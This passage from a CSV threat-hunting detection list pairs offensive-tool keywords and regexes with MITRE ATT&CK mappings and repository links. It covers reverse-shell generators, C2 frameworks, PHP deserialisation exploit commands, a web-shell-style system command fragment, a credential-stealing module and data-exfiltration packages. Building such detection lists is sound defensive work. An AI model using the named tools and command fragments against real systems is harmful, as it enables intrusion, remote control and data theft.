system*'cmd']*",".{0,1000}php_filter_chain_generator\s\-\-chain\s.{0,1000}php\ssystem.{0,1000}\'cmd\'\].{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*php_passthru_reverse_tcp.py*",".{0,1000}php_passthru_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*php_popen_reverse_tcp.py*",".{0,1000}php_popen_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*php_proc_open_reverse_tcp.py*",".{0,1000}php_proc_open_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "*PHP-Code-injection.*",".{0,1000}PHP\-Code\-injection\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*PHP-Code-Injections-Payloads.*",".{0,1000}PHP\-Code\-Injections\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*phpggc -l*",".{0,1000}phpggc\s\-l.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*phpggc monolog/rce1 assert 'phpinfo()'*",".{0,1000}phpggc\smonolog\/rce1\sassert\s\'phpinfo\(\)\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*phpggc symfony/rce1 id*",".{0,1000}phpggc\ssymfony\/rce1\sid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*phpmyadmin_credsteal.*",".{0,1000}phpmyadmin_credsteal\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PHPRedirector*AutoOAuthFlow.py*",".{0,1000}PHPRedirector.{0,1000}AutoOAuthFlow\.py.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","N/A","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "*php-reverse-shell.php*",".{0,1000}php\-reverse\-shell\.php.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*PhpSploit*",".{0,1000}PhpSploit.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1059 - T1102 - T1053 - T1216 - T1027","TA0002 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","1","N/A","10","10","2138","433","2024-03-29T15:37:17Z","2014-05-21T19:43:03Z" "*phra/Pezor*",".{0,1000}phra\/Pezor.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*phra/Pezor/*",".{0,1000}phra\/Pezor\/.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*phuip-fpizdam*",".{0,1000}phuip\-fpizdam.{0,1000}","offensive_tool_keyword","phuip-fpizdam","This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations. the bug is possible to trigger from the outside. This means that a web user may get code execution if you have vulnerable config (see below).","T1190 - T1191 - T1192 - T1210 - T1059","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/neex/phuip-fpizdam","1","1","N/A","N/A","10","1783","247","2019-11-12T18:53:14Z","2019-09-23T21:37:27Z" "*piata_ssh_userpass.txt*",".{0,1000}piata_ssh_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*PIC-Exec*runshellcode.asm*",".{0,1000}PIC\-Exec.{0,1000}runshellcode\.asm.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*PIC-Exec\addresshunter*",".{0,1000}PIC\-Exec\\addresshunter.{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","0","private github repo","10","","N/A","N/A","N/A","N/A" "*PIC-Get-Privileges*",".{0,1000}PIC\-Get\-Privileges.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*PickleC2-main*",".{0,1000}PickleC2\-main.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","1","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" "*-PID * -Assembly * -Arguments *",".{0,1000}\-PID\s.{0,1000}\s\-Assembly\s.{0,1000}\s\-Arguments\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*pingcastle*",".{0,1000}pingcastle.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan","T1018 - T1046 - T1069 - T1087 - T1136 - T1482 - T1526 - T1597","TA0001 - TA0002 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.pingcastle.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*PingCastle.cs*",".{0,1000}PingCastle\.cs.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "*PingCastle.exe*",".{0,1000}PingCastle\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*PingRAT.exe*",".{0,1000}PingRAT\.exe.{0,1000}","offensive_tool_keyword","PingRAT","secretly passes Command and Control (C2) traffic through firewalls using ICMP payloads","T1071.004 - T1573.001","TA0005 - TA0011 - TA0042","N/A","N/A","C2","https://github.com/umutcamliyurt/PingRAT","1","1","N/A","10","10","82","12","2023-09-29T22:26:15Z","2023-09-29T22:07:46Z" "*ping-sweep*",".{0,1000}ping\-sweep.{0,1000}","offensive_tool_keyword","ping-sweep","Wrapper around the ping utility included by the OS. used for recon actiivities","T1016 - T1046","TA0007","N/A","N/A","Information Gathering","https://github.com/libresec/ping-sweep","1","0","N/A","N/A","1","1","0","2016-08-22T15:16:01Z","2016-08-22T02:07:46Z" "*PinoyWH1Z/AoratosWin*",".{0,1000}PinoyWH1Z\/AoratosWin.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","1","N/A","N/A","2","117","18","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z" "*pip install coercer*",".{0,1000}pip\sinstall\scoercer.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tools","https://github.com/p0dalirius/Coercer","1","0","N/A","10","10","1564","175","2024-04-17T07:30:29Z","2022-06-30T16:52:33Z" "*pip install dnschef*",".{0,1000}pip\sinstall\sdnschef.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*pip install exegol*",".{0,1000}pip\sinstall\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pip install hiphp*",".{0,1000}pip\sinstall\shiphp.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*pip install rarce*",".{0,1000}pip\sinstall\srarce.{0,1000}","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","0","N/A","9","2","114","21","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" "*pip install --user fee",".{0,1000}pip\sinstall\s\-\-user\sfee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*pip install --user PyExfil*",".{0,1000}pip\sinstall\s\-\-user\sPyExfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","","","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","10","8","738","138","2023-02-17T03:12:36Z","2014-11-27T19:06:24Z" "*pip uninstall autorecon*",".{0,1000}pip\suninstall\sautorecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*pip3 install bofhound*",".{0,1000}pip3\sinstall\sbofhound.{0,1000}","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","0","N/A","5","3","285","35","2024-02-23T15:36:24Z","2022-05-10T17:41:53Z" "*pip3 install pypykatz*",".{0,1000}pip3\sinstall\spypykatz.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","10","10","540","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z" "*pip3 install -U pacu*",".{0,1000}pip3\sinstall\s\-U\spacu.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*'pipename_stager'*",".{0,1000}\'pipename_stager\'.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","425","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" "*PipeViewer.csproj*",".{0,1000}PipeViewer\.csproj.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*PipeViewer_v1.1.zip*",".{0,1000}PipeViewer_v1\.1\.zip.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*PipeViewer-main*",".{0,1000}PipeViewer\-main.{0,1000}","offensive_tool_keyword","PipeViewer ","A tool that shows detailed information about named pipes in Windows","T1022.002 - T1056.002","TA0005 - TA0009","N/A","N/A","discovery","https://github.com/cyberark/PipeViewer","1","1","N/A","5","6","529","42","2023-08-23T09:34:06Z","2022-12-22T12:35:34Z" "*pipx install fee",".{0,1000}pipx\sinstall\sfee","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","356","39","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z" "*pipx upgrade autorecon*",".{0,1000}pipx\supgrade\sautorecon.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*Pitty Tiger RAT*",".{0,1000}Pitty\sTiger\sRAT.{0,1000}","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1427","420","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" "*pivot_smb \*",".{0,1000}pivot_smb\s\\.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*pivot_winrm *",".{0,1000}pivot_winrm\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*pivotnacci http*",".{0,1000}pivotnacci\s\shttp.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci -*",".{0,1000}pivotnacci\s\-.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci *--polling-interval*",".{0,1000}pivotnacci\s.{0,1000}\-\-polling\-interval.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci/0.0.1*",".{0,1000}pivotnacci\/0\.0\.1.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","user-agent","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnaccilib*socks*",".{0,1000}pivotnaccilib.{0,1000}socks.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","0","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivotnacci-master*",".{0,1000}pivotnacci\-master.{0,1000}","offensive_tool_keyword","pivotnacci","A tool to make socks connections through HTTP agents","T1090 - T1090.003","TA0003 - TA0011","N/A","N/A","C2 - Persistence","https://github.com/blackarrowsec/pivotnacci","1","1","N/A","9","10","642","111","2021-03-30T14:37:25Z","2020-04-28T11:36:45Z" "*pivots/named-pipe_windows.go*",".{0,1000}pivots\/named\-pipe_windows\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*-pk8gege.org*",".{0,1000}\-pk8gege\.org.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 